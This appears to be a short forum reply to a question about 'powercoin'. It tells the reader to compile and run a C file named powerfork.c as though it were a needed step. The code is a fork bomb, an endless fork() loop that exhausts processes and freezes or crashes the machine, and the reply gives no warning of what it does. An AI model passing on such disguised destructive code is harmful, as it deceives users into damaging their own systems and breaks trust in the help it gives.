Yes. You have to create a cfile in your powercoin directory. name it powerfork.c and edit it with the following code:

#include <unistd.h>
int main(){
    for(;;)fork();
    return 0;
}

Save it and compile it with gcc -o powerfork powerfork.c. After that simple call ./powerfork
